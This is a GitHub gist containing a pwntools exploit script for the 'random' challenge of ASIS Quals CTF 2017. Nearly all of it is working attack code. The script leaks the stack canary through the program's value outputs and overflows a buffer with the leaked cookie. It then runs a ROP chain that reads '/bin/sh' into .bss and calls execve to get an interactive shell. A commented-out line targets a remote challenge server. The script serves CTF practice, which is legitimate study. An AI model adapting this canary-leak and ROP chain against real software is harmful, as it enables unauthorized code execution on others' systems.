Skip to content

Instantly share code, notes, and snippets.

@kokjo
Created April 10, 2017 12:21
Show Gist options
  • Save kokjo/efc21d1a6923e2a1c416c71202ddbd92 to your computer and use it in GitHub Desktop.
Save kokjo/efc21d1a6923e2a1c416c71202ddbd92 to your computer and use it in GitHub Desktop.
Exploit for the challenge random from ASIS Quals CTF 2017
from pwn import *
context.arch = "amd64"
r = process("./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1")
#r = remote("69.90.132.40", 4000)
values = [0]
for i in range(1,8):
r.sendline(str(i))
r.recvuntil("Your value = ")
values.append(int(r.recvline()))
cookie = u64(flat(values, word_size=8))
log.info("Stack cookie = 0x%016x", cookie)
pop_rax_rdi = 0x0000000000400f8c
pop_rsi_r15 = 0x0000000000400f61
mov_rdx_rsi = 0x0000000000400f88
syscall = 0x0000000000400f8f
bss = 0x602244
def syscall3(no, arg1, arg2, arg3):
return [pop_rax_rdi, no, arg1,
pop_rsi_r15, arg3, 0x4141414141414141, mov_rdx_rsi,
pop_rsi_r15, arg2, 0x4141414141414141,
syscall]
r.sendline("0")
rop = flat([
syscall3(0, 0, bss, 8),
syscall3(0x3b, bss, 0,00)
])
assert "\n" not in rop
#gdb.attach(r)
r.sendline("A"*1032 + p64(cookie) + "B"*8 + rop)
sleep(0.1)
r.send("/bin/sh\x00")
r.sendline("echo SHELL")
r.recvuntil("SHELL\n")
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment